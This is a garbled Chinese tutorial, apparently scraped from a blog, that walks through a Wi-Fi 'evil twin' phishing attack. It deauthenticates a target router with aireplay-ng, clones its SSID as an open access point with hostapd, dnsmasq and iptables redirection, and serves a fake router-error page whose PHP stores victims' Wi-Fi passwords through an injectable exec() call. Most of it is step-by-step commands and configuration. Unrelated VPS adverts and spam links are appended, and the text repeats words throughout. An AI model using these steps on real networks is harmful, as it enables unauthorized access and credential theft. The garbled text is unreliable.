伪造无线路由器错误信息来获取无线密码的方法前言:这篇文章出于我前段时间的一个想法,就是通过伪造无线路由器错误信息来欺骗机主,然后取得无线密码.
后来就不断地试验实践,最后成功了,就有了今天的这篇文章,高三比较忙,所以弄了这么久.
当然我不是为了教会大家破解别人的无线网络而写这篇文章,只是为了让大家了解无线网络的安全问题和交流技术,知道这种技术的原理,才能避免被攻击.
为了便于大多数读者理解,我尽量没有使用很多专业词汇,可能不够严谨,望见谅!
本文使用了以下这些开源软件,在这里感谢这些软件的开发者:aircrack-ng:aircrack-ng:aircrack-ng:aircrack-ng:http://www.
aircrack-ng.
org/http://www.
aircrack-ng.
org/http://www.
aircrack-ng.
org/http://www.
aircrack-ng.
org/dnsmasq:dnsmasq:dnsmasq:dnsmasq:http://www.
thekelleys.
org.
uk/dnsmasq/http://www.
thekelleys.
org.
uk/dnsmasq/http://www.
thekelleys.
org.
uk/dnsmasq/http://www.
thekelleys.
org.
uk/dnsmasq/doc:doc:doc:doc:http://www.
luyouqiwang.
com/http://www.
luyouqiwang.
com/http://www.
luyouqiwang.
com/http://www.
luyouqiwang.
com/lighttpd:lighttpd:lighttpd:lighttpd:http://www.
lighttpd.
net/http://www.
lighttpd.
net/http://www.
lighttpd.
net/http://www.
lighttpd.
net/php:php:php:php:http://php.
net/http://php.
net/http://php.
net/http://php.
net/overview:overview:overview:overview:首先简略地说说基本的思路,使用airodump-ngairodump-ngairodump-ngairodump-ng查看有那些客户端正在使用无线网络,然后通过aireplay-ngaireplay-ngaireplay-ngaireplay-ng持续攻击某个APAPAPAP,使该客户端保持可以搜索到自己的APAPAPAP,但是又连接不上的状态.
这时我们就马上伪造一个SSIDSSIDSSIDSSID和该AAAAPPPP相同不加密的APAPAPAP,因为普通的用户都是不懂技术的,正在和MMMMMMMM聊得欢,突然就断开了,这该多恼火~~~~这样一般该机主就会下意识地点击连接我们这个伪造的APAPAPAP,然后轻而易举地连接上了.
这时机主回到QQQQQQQQ,诶~~~~怎么还是连接不上然后就打开浏览器随便访问一个网络地址测试一下,这时我们就要让他打开事先准备好的网页,说他的APAPAPAP出错误了云云,然后然他输入无线密码来重启无线路由器排除故障,他一着急,就输入了自己的无线密码啦~~~~这时密码就会被提交到我们电脑上的phpphpphpphp,然后phpphpphpphp就把这个密码写入某个文件保存起来,哈哈!
不费吹灰之力对吧然后我们就停止对他APAPAPAP的攻击,神不知鬼不觉地~~~~机主见恢复正常了,就把这小插曲抛诸脑后啦!
这里面也有一点社会工程学的意思.
相关的原理和细节我在后面慢慢和大家叙述.
本文以安装了xubuntu12.
04.
3xubuntu12.
04.
3xubuntu12.
04.
3xubuntu12.
04.
3的笔记本电脑为系统环境,前段时间我安装了xbuntu13.
10xbuntu13.
10xbuntu13.
10xbuntu13.
10,结果各种不稳定各种错误,在HackingHackingHackingHacking的时候居然在serviceserviceserviceservice里面找不到Network-managerNetwork-managerNetwork-managerNetwork-manager,导致HackingHackingHackingHacking的时候网卡被关闭.
不得不感叹UbuntuUbuntuUbuntuUbuntu变得越来越用户友好,但是却越来越难配置.
所以我回到了xubuntu12.
04xubuntu12.
04xubuntu12.
04xubuntu12.
04,后来我也用过ArchLinuxArchLinuxArchLinuxArchLinux,很轻量很快速,可以轻易配置整个系统.
但是为了简单起见,本文还是使用了ubuntuubuntuubuntuubuntu作为系统环境.
行首是""""####""""代表是使用超级用户运行该命令,这都是约定俗成的.
不多说,另外配置文件和网页代码的内容我都用代码框框起来的了,需要执行的指令则是用黄色加亮.
一些命令的用途:airmon-ngairmon-ngairmon-ngairmon-ng:方便地将网卡配置成攻击时所需监听模式(monitor(monitor(monitor(monitormode)mode)mode)mode).
airodump-ngairodump-ngairodump-ngairodump-ng:监听无线网络,查看有那些活动的无线网络.
aireplay-ngaireplay-ngaireplay-ngaireplay-ng:对对方无线网络进行注入攻击,这里用来使客户端断线.
dnsmasq:dnsmasq:dnsmasq:dnsmasq:提供一个内网DNSDNSDNSDNS,以及dhcpdhcpdhcpdhcp服务.
lighttpdlighttpdlighttpdlighttpd:提供一个WebWebWebWeb服务器,用来显示我们伪造的错误信息页面.
php-cgiphp-cgiphp-cgiphp-cgi:lighttpdlighttpdlighttpdlighttpd通过fastcgifastcgifastcgifastcgi连接到phpphpphpphp,用来获取并保存用户输入的信息.
iptables:iptables:iptables:iptables:配置防火墙,因为hostapdhostapdhostapdhostapd要用到NATNATNATNAT(网络地址转换)hostapdhostapdhostapdhostapd:一个软APAPAPAP,等于把你的电脑变成一个无线无线路由器基本流程如下图所示,这里先解释下hackhackhackhack的基本流程:监听无线网络找到攻击目标》攻击目标使其断线》机主连接到伪造的APAPAPAP》机主客户端发出dhcpdhcpdhcpdhcp请求》dnsmasqdnsmasqdnsmasqdnsmasq接收到机主的请求,返回网络配置信息,DNDNDNDNSSSS服务器和路由的IPIPIPIP都设置为伪造APAPAPAP的IPIPIPIP》机主收到dnsmasqdnsmasqdnsmasqdnsmasq返回的信息,配置网络成功》机主试图访问http://www.
53tusiji.
cnhttp://www.
53tusiji.
cnhttp://www.
53tusiji.
cnhttp://www.
53tusiji.
cn,机主的浏览器向dnsmasqdnsmasqdnsmasqdnsmasq查询域名信息,dnsmasqdnsmasqdnsmasqdnsmasq返回正确的IPIPIPIP地址xxx.
xxx.
xxx.
xxxxxx.
xxx.
xxx.
xxxxxx.
xxx.
xxx.
xxxxxx.
xxx.
xxx.
xxx给机主的浏览器》机主的浏览器开始连接xxx.
xxx.
xxx.
xxxxxx.
xxx.
xxx.
xxxxxx.
xxx.
xxx.
xxxxxx.
xxx.
xxx.
xxx》数据包经过伪造APAPAPAP时,iptablesiptablesiptablesiptables把数据包的目标地址转换成本机,这样无论机主试图访问什么主机,最后都会连接到伪造APAPAPAP里面的WebWebWebWeb服务器lighttpdlighttpdlighttpdlighttpd》lighttpdlighttpdlighttpdlighttpd收到请求,用过rewriterewriterewriterewrite重定向到伪造的错误页面,这样无论机主请求的是什么页面,最后都会访问到我们伪造的错误页面》用户输入无线密码》lighttpdlighttpdlighttpdlighttpd把用户输入的数据传送给phpphpphpphp,phpphpphpphp把密码写入到/var/www/password/var/www/password/var/www/password/var/www/password.
开始工作:首先当然是切换到超级用户:$sudo$sudo$sudo$sudo-s-s-s-s安装所需全部软件:#apt-get#apt-get#apt-get#apt-getinstallinstallinstallinstallaircrackaircrackaircrackaircracklighttpdlighttpdlighttpdlighttpddnsmasqdnsmasqdnsmasqdnsmasqphp5-cgiphp5-cgiphp5-cgiphp5-cgi停止network-managernetwork-managernetwork-managernetwork-manager,以免干扰我们的操作:#service#service#service#servicenetwork-managernetwork-managernetwork-managernetwork-manager下载相关文件:访问http://pan.
baidu.
com/s/1mgI4bv6http://pan.
baidu.
com/s/1mgI4bv6http://pan.
baidu.
com/s/1mgI4bv6http://pan.
baidu.
com/s/1mgI4bv6,下载全部文件备用开启lighttpdlighttpdlighttpdlighttpd的phpphpphpphp支持:#lighttpd-enable-mod#lighttpd-enable-mod#lighttpd-enable-mod#lighttpd-enable-modfastcgi-phpfastcgi-phpfastcgi-phpfastcgi-php开始配置相关程序,为了方便大家我已经把一切都做好了.
复制dnsmasq.
confdnsmasq.
confdnsmasq.
confdnsmasq.
conf到/etc/dnsmasq.
conf/etc/dnsmasq.
conf/etc/dnsmasq.
conf/etc/dnsmasq.
conf复制lighttpd.
conflighttpd.
conflighttpd.
conflighttpd.
conf到/etc/lighttpd/lighttpd.
conf/etc/lighttpd/lighttpd.
conf/etc/lighttpd/lighttpd.
conf/etc/lighttpd/lighttpd.
conf复制hostapd.
confhostapd.
confhostapd.
confhostapd.
conf到/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf复制index.
html,passwd.
phpindex.
html,passwd.
phpindex.
html,passwd.
phpindex.
html,passwd.
php到/var/www//var/www//var/www//var/www/编辑/etc/php5/cgi/php.
ini/etc/php5/cgi/php.
ini/etc/php5/cgi/php.
ini/etc/php5/cgi/php.
ini,找到这一行:;cgi.
fix_pathinfo=1;cgi.
fix_pathinfo=1;cgi.
fix_pathinfo=1;cgi.
fix_pathinfo=1把最前面的"""";;;;""""号去掉,保存,这个配置选项是更改phpphpphpphp的目录信息,使最后phphphphpppp写入的密码文件放在正确的目录下(即/var/www//var/www//var/www//var/www/).
设置目录权限,这是为了让phpphpphpphp可以写入密码文件/var/www/password/var/www/password/var/www/password/var/www/password:#chmod#chmod#chmod#chmod777777777777/var/www//var/www//var/www//var/www/-R-R-R-R重新启动相关程序:#killall#killall#killall#killallphp-cgiphp-cgiphp-cgiphp-cgi#service#service#service#servicednsmasqdnsmasqdnsmasqdnsmasqrestartrestartrestartrestart#service#service#service#servicelighttpdlighttpdlighttpdlighttpdrestartrestartrestartrestart测试lighttpdlighttpdlighttpdlighttpd:在firefoxfirefoxfirefoxfirefox里面访问http://127.
0.
0.
1http://127.
0.
0.
1http://127.
0.
0.
1http://127.
0.
0.
1,测试网页是否能够正常显示,然后再访问http://127.
0.
0.
1/xxxxxxhttp://127.
0.
0.
1/xxxxxxhttp://127.
0.
0.
1/xxxxxxhttp://127.
0.
0.
1/xxxxxx,看看是否还能打开错误提示页面.
因为到时你并不知道用户会打开什么网站的什么页面,假设到时机主在浏览器里面访问的是http://www.
luyouqiwang.
com/tplink/http://www.
luyouqiwang.
com/tplink/http://www.
luyouqiwang.
com/tplink/http://www.
luyouqiwang.
com/tplink/,,,,因为我们搭建的""""网站""""并没有.
help/source.
help/source.
help/source.
help/source这个文件,就会出现404404404404错误,为了避免这个问题,所以我就使用了rewriterewriterewriterewrite技术,也就是地址重写技术.
这样用户只要是访问我们搭建出来的""""网站"""",无论在IPIPIPIP地址后面输入什么东西,都会访问到我写的错误页面index.
htmlindex.
htmlindex.
htmlindex.
html.
有意思吧rewriterewriterewriterewrite配置的细节在lighttpd.
conflighttpd.
conflighttpd.
conflighttpd.
conf里面:url.
rewrite=(url.
rewrite=(url.
rewrite=(url.
rewrite=("^/passwd.
php/(.
+)""^/passwd.
php/(.
+)""^/passwd.
php/(.
+)""^/passwd.
php/=>=>=>"$0","$0","$0","$0",index.
html"index.
html"index.
html"index.
html"))))这里rewriterewriterewriterewrite规则用了perlperlperlperl的正则表达式,以上配置的意思是:如果urlurlurlurl不是以passwd.
phpasswd.
phpasswd.
phpasswd.
phpppp开头的,全部重写到index.
htmlindex.
htmlindex.
htmlindex.
html,passwd.
phpasswd.
phpasswd.
phpasswd.
phpppp是用来保存密码的,我们当然不能重写它的地址.
关于passwd.
phppasswd.
phppasswd.
phppasswd.
php的内容我们接下来就解释.
测试php:php:php:php:这里随手输入一个密码看看,我输入了:""""123456789123456789123456789123456789""""这里的细节可以查看index.
htmlindex.
htmlindex.
htmlindex.
html文件,我在里买创建了一个表单::::method="">method="">method="">/>/>/>/>/>/>表单里面有一个密码输入框,一个提交按钮,当我们在密码输入框里面输入密码""""123456789123456789123456789123456789"""",点击""""确认重启""""按钮后,密码输入框里的内容就会被提交到""""passwd.
phppasswd.
phppasswd.
phppasswd.
php"""",这是浏览器就会打开一个地址:""""http://127.
0.
0.
1/passwd.
phppasswd=123456789http://127.
0.
0.
1/passwd.
phppasswd=123456789http://127.
0.
0.
1/passwd.
phppasswd=123456789http://127.
0.
0.
1/passwd.
phppasswd=123456789"""",地址后面的passwd=123456789passwd=123456789passwd=123456789passwd=123456789就是密码数据,然后我们就要想办法把这个密码数据保存下来.
具体是怎么保存的呢可以查看passwd.
phppasswd.
phppasswd.
phppasswd.
php,里面有这么两行:$com$com$com$com===="touch"touch"touch"touchpasswordpasswordpasswordpassword&&&&&&&&echoechoechoecho$_GET[passwd]$_GET[passwd]$_GET[passwd]$_GET[passwd]>>>>>>>>password";password";password";password";exec($com);exec($com);exec($com);exec($com);用到了phpphpphpphp的exec()exec()exec()exec()函数,这个函数就等于一个系统shellshellshellshell程序,可以在里面运行系统命令,这里运行了"touch"touch"touch"touchpasswordpasswordpasswordpassword&&&&&&&&echoechoechoecho$_GET[passwd]$_GET[passwd]$_GET[passwd]$_GET[passwd]>>>>>>>>password"password"password"password"这篇文章的读者应该都清楚这条命令的意思,&&&&&&&&前面的""""touchtouchtouchtouchpasswordpasswordpasswordpassword""""就是检测是否存在""""passwordpasswordpasswordpassword""""文件,如果不存在则新建一个,&&&&&&&&后面的命令用到了$_GET[passwd]$_GET[passwd]$_GET[passwd]$_GET[passwd],这个的作用就是获取urlurlurlurl后面passwdpasswdpasswdpasswd参数的内容,因为我们访问的urlurlurlurl为""""http://127.
0.
0.
1/passwd.
phppasswd=123456789http://127.
0.
0.
1/passwd.
phppasswd=123456789http://127.
0.
0.
1/passwd.
phppasswd=123456789http://127.
0.
0.
1/passwd.
phppasswd=123456789"""",也就等于获取passwd=123456789passwd=123456789passwd=123456789passwd=123456789里面的""""123456789123456789123456789123456789"""",,,,然后""""echoechoechoecho$_GET[passwd]$_GET[passwd]$_GET[passwd]$_GET[passwd]>>>>>>>>passwordpasswordpasswordpassword""""就等于把字符串""""123456789123456789123456789123456789""""追加到文件""""passwordpasswordpasswordpassword""""的末尾.
然后显示错误信息:echo("echo("echo("echo("很不幸!
进程出错!
");");");");echo("echo("echo("echo("请手动关闭路由器电源,两小时后重试!
故障应很快解除.
");");");");这里我耍了小花招,因为我们也没有办法真的让机主的无线路由器重启,只能让他自己关两个小时咯!
当我们搜索不到机主的无线路由器时,我们就知道机主已经输入了密码并且手动关闭了电源了.
然后我们就可以收工啦!
查看密码写入是否成功:#more#more#more#more/var/www/password/var/www/password/var/www/password/var/www/password显示123456789123456789123456789123456789,就表示我刚才输入的密码123456789123456789123456789123456789被保存到/var/www/password/var/www/password/var/www/password/var/www/password这个文件里面了,phpphpphpphp配置成功啦!
OK!
OK!
OK!
OK!
伪造的错误页面能运作了,继续下一步.
设置网卡为监听模式:#airmon-ng#airmon-ng#airmon-ng#airmon-ngstartstartstartstartwlan0wlan0wlan0wlan0airmon-ngairmon-ngairmon-ngairmon-ng其实是一个shellshellshellshell脚本,为了方便配置无线网络而编写的,命令运行后就会多出一个""""mon0mon0mon0mon0""""设备,这个设备是在wlanwlanwlanwlan0000的硬件基础上虚拟出来的,这时不影响你继续使用原来的wlan0wlan0wlan0wlan0,好用吧开始抓包监听:#airodump-ng#airodump-ng#airodump-ng#airodump-ngmon0mon0mon0mon0慢慢等候,抓到的包会越来越多,然后找一个信号比较好的,机主使用比较活跃的APAPAPAP,上面DataDataDataData这一栏下如果在跳动,就说明有人在使用这个无线路由器.
记下目标APAPAPAP的ESSIDESSIDESSIDESSID和BSSIDBSSIDBSSIDBSSID,这在我们接下来伪造路由器和注入攻击有用.
编辑/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf,找到这一行:ssid=testssid=testssid=testssid=testtesttesttesttest改成目标ESSIDESSIDESSIDESSID(也就是无线路由器名),,,,我这里改成wifi-XWZwifi-XWZwifi-XWZwifi-XWZ然后找到这一行:interface=wlan1interface=wlan1interface=wlan1interface=wlan1把里面的wlan1wlan1wlan1wlan1改成你的无线设备名,本文使用的无线网卡是wlan0,wlan0,wlan0,wlan0,就改成wlan0wlan0wlan0wlan0,,,,保存.
启动我们的伪造APAPAPAP:#hostapd#hostapd#hostapd#hostapd/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf/etc/hostapd/hostapd.
conf设置wlan0wlan0wlan0wlan0的ipipipip地址,不然dnsmasqdnsmasqdnsmasqdnsmasq的dhcpdhcpdhcpdhcp功能会失效::::#ifconfig#ifconfig#ifconfig#ifconfigwlan0wlan0wlan0wlan0192.
168.
1.
1/24192.
168.
1.
1/24192.
168.
1.
1/24192.
168.
1.
1/24dhcpdhcpdhcpdhcp就是动态主机配置协议,用来自动配置网络,自动分配无线地址的,现在的设备默认都是使用dhcpdhcpdhcpdhcp分配地址了,如果没有安装dhcpdhcpdhcpdhcp服务器,那么无线设备就无法成功连接到我们伪造的无线路由器.
关于dnsmasqdnsmasqdnsmasqdnsmasq的dhcpdhcpdhcpdhcp配置可以看到dnsmasq.
confdnsmasq.
confdnsmasq.
confdnsmasq.
conf里面这两行:dhcp-range=192.
168.
1.
2,192.
168.
1.
100,255.
255.
255.
0,12hdhcp-range=192.
168.
1.
2,192.
168.
1.
100,255.
255.
255.
0,12hdhcp-range=192.
168.
1.
2,192.
168.
1.
100,255.
255.
255.
0,12hdhcp-range=192.
168.
1.
2,192.
168.
1.
100,255.
255.
255.
0,12h这一行配置了分配出去地网络地址范围是192.
168.
1.
2192.
168.
1.
2192.
168.
1.
2192.
168.
1.
2到192.
168.
1.
100,192.
168.
1.
100,192.
168.
1.
100,192.
168.
1.
100,还有子网掩码,还有租约时间是12h12h12h12h也就是12121212小时,这个不重要,这里不多说.
dhcp-option=option:router,192.
168.
1.
1dhcp-option=option:router,192.
168.
1.
1dhcp-option=option:router,192.
168.
1.
1dhcp-option=option:router,192.
168.
1.
1这一行配置了分配出去的网络配置信息中默认路由的IPIPIPIP地址,这里设置为伪造的路由器的IPIPIPIP地址""""192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1"""".
那么路由有什么作用呢路由就是用来转发网络数据包的设备,来实现不同网段的网络互连.
有一部电脑的内网IPIPIPIP地址为192.
168.
1.
5,192.
168.
1.
5,192.
168.
1.
5,192.
168.
1.
5,子网掩码为255.
255.
255.
0255.
255.
255.
0255.
255.
255.
0255.
255.
255.
0,想访问IPIPIPIP地址12.
12.
12.
1212.
12.
12.
1212.
12.
12.
1212.
12.
12.
12,这时它的设备就通过子网掩码计算出12.
12.
12.
1212.
12.
12.
1212.
12.
12.
1212.
12.
12.
12和它不是在同一个子网里面的,不能直接通信,它就直接把数据发送到默认路由192.
168.
1.
1,192.
168.
1.
1,192.
168.
1.
1,192.
168.
1.
1,让路由器帮它转发.
这里面还有一个DNSDNSDNSDNS的知识,DNSDNSDNSDNS就是域名系统的意思,简单说就是把域名转换成IPIPIPIP地址的服务,因为人类对数字不敏感,访问网站的时候要记住一串IPIPIPIP地址太麻烦了,所以就有了DNSDNSDNSDNS,比如你在你的浏览器里面访问www.
luyouqiwang.
comwww.
luyouqiwang.
comwww.
luyouqiwang.
comwww.
luyouqiwang.
com,那么你的浏览器就会先连接到DNSDNSDNSDNS服务器,查询到www.
luyouqiwang.
comwww.
luyouqiwang.
comwww.
luyouqiwang.
comwww.
luyouqiwang.
com对应的IPIPIPIP地址为119.
75.
218.
70119.
75.
218.
70119.
75.
218.
70119.
75.
218.
70,然后浏览器就开始和119.
75.
218.
70119.
75.
218.
70119.
75.
218.
70119.
75.
218.
70上服务器通信,整个DNSDNSDNSDNS查询过程不需要人工干预,而当你的浏览器访问不了DNSDNSDNSDNS服务器的时候,你也就无法正常上网咯!
而我们并不打算让连接到伪造路由器上的客户端访问外网的DNSDNSDNSDNS服务器,所以直接在伪造的路由器上面搭建一个DNSDNSDNSDNS服务器.
关于DNSDNSDNSDNS服务器的配置,dnsmasqdnsmasqdnsmasqdnsmasq这个软件默认就已经可以工作了,不需要额外的配置,这里就不多废话了.
设置网络地址转换,让所有数据包到返回到本机::::#iptables#iptables#iptables#iptables-t-t-t-tnatnatnatnat-A-A-A-APREROUTINGPREROUTINGPREROUTINGPREROUTING-s-s-s-s192.
168.
1.
0/24192.
168.
1.
0/24192.
168.
1.
0/24192.
168.
1.
0/24-i-i-i-iwlan0wlan0wlan0wlan0-j-j-j-jDNATDNATDNATDNAT--to--to--to--to192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1由于从机主在DNSDNSDNSDNS服务器上面查询到的IPIPIPIP地址五花八门,但是我们只希望他访问到我们搭建的获取密码的""""网站"""",所以我就使用了NATNATNATNAT技术,把所有来自wlan0,wlan0,wlan0,wlan0,网段192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1————————192.
168.
1.
254192.
168.
1.
254192.
168.
1.
254192.
168.
1.
254的数据包的目的地址都改为192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1,也就是伪造的路由器的IPIPIPIP地址,换句话说,无论他访问什么IPIPIPIP地址,加上rewriterewriterewriterewrite技术,机主是无论如何都会访问到我们搭建的""""网站"""",然后就把密码送上.
万事俱备,只欠东风,你得先让别人的手机断线,别人才有可能来连接你伪造的无线路由器对吧然后我们开始攻击目标APAPAPAP,其中参数-a-a-a-a后面的就是前面要你记下的目标路由器的BSSIDBSSIDBSSIDBSSID#aireplay-ng#aireplay-ng#aireplay-ng#aireplay-ngmon0mon0mon0mon0-0-0-0-00000--ignore-negative-one--ignore-negative-one--ignore-negative-one--ignore-negative-one-a-a-a-aD4:B1:10:F5:2D:34D4:B1:10:F5:2D:34D4:B1:10:F5:2D:34D4:B1:10:F5:2D:34等待吧!
这需要一点耐心和运气,等到""""鱼儿""""上勾后,查看""""送""""给你的密码吧::::#more#more#more#more/var/www/password/var/www/password/var/www/password/var/www/passwordPSPSPSPS:本来想到可以用DNSDNSDNSDNS泛解析的,就是让所有DNSDNSDNSDNS查询请求都返回本机地址(192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1192.
168.
1.
1),可是搞不定.
好像aircrack-ngaircrack-ngaircrack-ngaircrack-ng包里面的airbase-ngairbase-ngairbase-ngairbase-ng都可以创建一个软无线路由器,但是好像在我的机器上工作不怎么正常,就没研究.
另外为了能够解析DNSDNSDNSDNS,你的机器首先要连接上网络.
这是我获取别人的资料有意向的朋友进群:308169234308169234308169234308169234大家一起学习
hostyun新上了香港cloudie机房的香港原生IP的VPS,写的是默认接入200Mbps带宽(共享),基于KVM虚拟,纯SSD RAID10,三网直连,混合超售的CN2网络,商家对VPS的I/O有大致100MB/S的限制。由于是原生香港IP,所以这个VPS还是有一定的看头的,这里给大家弄个测评,数据仅供参考!9折优惠码:hostyun,循环优惠内存CPUSSD流量带宽价格购买1G1核10G3...
Hostigger 主机商在前面的文章中也有介绍过几次,这个商家运营时间是有一些年份,只不过在我们圈内好像之前出现的次数不多。最近这段时间商家有提供不限流量的VPS主机,逐渐的慢慢被人认识到。在前面的介绍到他们提供的机房还是比较多的,比如土耳其、美国等。今天看到Hostigger 商家居然改动挺大的,原来蛮好的域名居然这次连带官方域名都更换掉去掉一个G(Hostiger )。估摸着这个域名也是之前...
Hostodo 商家是比较小众的国外VPS主机商,这不看到商家有推送促销优惠在美国西岸的斯波坎机房还有少部分库存准备通过低价格促销,年付低至12美元Linux VPS主机,且如果是1GB内存方案的可以享受六六折优惠,均是采用KVM架构,且可以支付宝付款。第一、商家优惠码优惠码:spokanessd 1GB+内存方案才可以用到优惠码,其他都是固定的优惠低至年12美元。第二、商家促销这里,我们可以看到...
如何修改无线路由器的密码为你推荐
多家五星酒店回应网传名媛拼单拼多多商家出钱叫买家好评会被处罚吗小度商城小度怎么下载app?云爆发什么是蒸汽云爆炸?要具备那些条件?广东GDP破10万亿__年,我国国内生产总值(GDP)首破10万亿元.目前,我国经济总量排名世界第___位?嘉兴商标注册怎么查商标注册日期老虎数码86年属虎的吉祥数字和求财方向www.ijinshan.com桌面上多了一个IE图标,打开后就链接到009dh.com这个网站,这个图标怎么删掉啊?ww.66bobo.com谁知道11qqq com被换成哪个网站www.1diaocha.com手机网赚是真的吗百度关键字百度推广关键词匹配方式有哪些?
yaokan永久域名经常更换 cn域名注册 cn域名备案 softbank官网 512av 抢票工具 css样式大全 debian7 微信收钱 phpmyadmin配置 vip域名 web服务器安全 paypal注册教程 东莞服务器 如何安装服务器系统 常州联通宽带 备案空间 重庆电信服务器托管 独立主机 阿里云邮箱登陆地址 更多